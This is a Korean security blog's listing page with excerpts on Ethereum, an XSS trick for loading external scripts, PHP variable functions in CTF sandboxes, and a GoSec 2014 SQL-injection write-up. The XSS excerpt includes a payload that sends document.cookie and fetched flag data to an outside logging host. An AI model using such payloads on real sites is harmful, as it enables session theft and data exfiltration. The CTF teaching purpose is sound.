Ethereum에 대해서

2018년은 가상 화폐의 해라고 봐도 될 정도로 많은 이슈들이 있었고 그에 따른 가격 변동도 있었다. 많은 가상 화폐들이 생겨났고 그에 따른 기술들도 많이 생겨났다. 이번 포스트에는 그 중에서 2세대 블록체인이라고 불리는 Ethereum에 대해서 알아보려한다. ( 내부적으로 들어가게 된다면 여러 복잡한 요소들이 나오는데 그 부분들은 다루지 않겠다. 그래서 포스팅에는 여태까지 프로그래밍을 하면서 머리속에 정리된 것에 대해서 꺼내보려한다.) Ethereum은 기존 비트코인에서 존재하지 않았던 Smart Contract가 가장 큰 차이점이라고 볼 수 있다. Smart Contract는 [Read More]

XSS - import .js file

XSS를 할때 <script> 태그가 막혀있고, <img src=@ onerror=script>와 같은 tag 안에 script를 넣어 공격을 해야하는 상황에서 긴 script를 넣어야 할때 유용하게 쓸 수 있습니다. example $.post("/login.php", { 'id': 'admin', }, function( data ) { $.get("/flag.php", function( data ) { $.post("http://example.com/log", { 'cookie': document.cookie, 'flag': data }, function( data ) { console.log(data); }); }); }); javascript 코드안에서 js 파일을 import 하는 [Read More]

PHP 가변함수로 문제를 풀어보자

PHP는 가장 유명한 웹프로그래밍 언어 중 하나입니다. 그래서 웹해킹을 공부한다면, 필수적으로 PHP에 대해서 알아야 한다. 이 포스팅에서 소개할 PHP의 가변함수는 CTF나 워게임에서 PHP Sandbox 문제가 나왔을 때 많은 도움을 줄 것이다. PHP의 가변함수는 단순히 해커들이 발견한 trick이 아니라, PHP에서 직접 지원해주는 정식의 기능이다. PHP.net의 가변함수에 대한 정보 <?php function foo() { echo "foo() 안입니다.<br />\n"; } function bar($arg = '') { echo "bar() 안입니다; 인수는 [Read More]

Find online hot single mom[GoSec 2014]

CTF에서 웹이라는 분야는 웹 서비스의 특성상 다시 풀어보기가 어려운 분야이다. 헌데 우연히 GoSec 2014에 출제되었던 문제를 풀어볼 수 있는 기회가 생기게되어 이에 대한 라이트업을 작성해보고자 한다. 다시 풀어볼 수 있는 링크는 이와같다. http://challenges.ringzer0team.com:10158/ (만약 Write-Up을 제공함으로써 문제에 대한 가치를 홰손하게 되는 경우가 발생하면 바로 글을 삭제하도록 하겠다, 또한 Sql injection에 사용된 코드는 올리지 않았으며 문제를 풀기위한 핵심 쿼리를 올려놓았다. 만약 공부를 위해 코드가 필요한 경우는 2peopledesu@ [Read More]